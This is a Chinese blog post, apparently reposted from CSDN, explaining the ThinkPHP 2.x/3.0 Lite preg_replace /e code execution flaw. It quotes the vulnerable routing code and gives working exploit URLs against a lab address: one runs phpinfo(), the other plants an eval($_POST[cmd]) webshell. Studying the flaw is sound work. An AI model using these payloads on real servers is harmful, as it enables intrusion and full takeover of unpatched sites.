ThinkPHP----1、ThinkPHP 2.x 任意代码执行漏洞

本文阅读 3 分钟

ThinkPHP是PHP语言的一种开源框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,ThinkPHP框架本身没有什么特别模块要求,具体的应用系统运行环境要求视开发所涉及的模块。 在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。

preg_replace() 函数:
preg_replace 函数执行一个正则表达式的搜索和替换。

语法:
mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )

参数说明:
$pattern: 要搜索的模式,可以是字符串或一个字符串数组。
$replacement: 用于替换的字符串或字符串数组。
$subject: 要搜索替换的目标字符串或字符串数组。
$limit: 可选,对于每个模式用于每个 subject 字符串的最大可替换次数。 默认是-1(无限制)。
$count: 可选,为替换执行的次数。

返回值:
如果 subject 是一个数组, preg_replace() 返回一个数组, 其他情况下返回一个字符串。
如果匹配被查找到,替换后的 subject 被返回,其他情况下 返回没有改变的 subject。如果发生错误,返回 NULL。

这个函数的3个参数,结合起来的意思是:如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时正则规则中使用了/e这个修饰符,则存在代码执行漏洞。

/e为可执行模式,此为PHP专有参数。 e 配合函数preg_replace()使用,可以把匹配来的字符串当作正则表达式执行; 。

造成Thinkphp 2.x任意代码执行的漏洞代码如下: ThinkPHPAppThinkPHPLibThinkUtilDispatcher.class.php:

// 获取当前路由参数对应的变量
if(!isset($_GET[C('VAR_ROUTER')])) { 
    $vars    =   explode(',',$route[2]);
    for($i=0;$i<count($vars);$i++)
        $_GET[$vars[$i]]     =   array_shift($paths);
    // 解析剩余的URL参数
    $res = preg_replace('@(\w+)\/([^,\/]+)@e', '$_GET[\'\\1\']="\\2";', implode('/',$paths));
}

1、写入phpinfo()

http:192.168.209.138:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D

img

2、写入webshell

http:192.168.209.138:8080/index.php?s=/index/index/name/${@print(eval($_POST[cmd]))}

发送请求后,页面虽然报错,但是已经写入成功,使用webshell工具连接。 img

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/sycamorelg/article/details/118701104
-- 展开阅读全文 --
Web安全—逻辑越权漏洞(BAC)
« 上一篇 03-13
Redis底层数据结构--简单动态字符串
下一篇 » 04-10

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复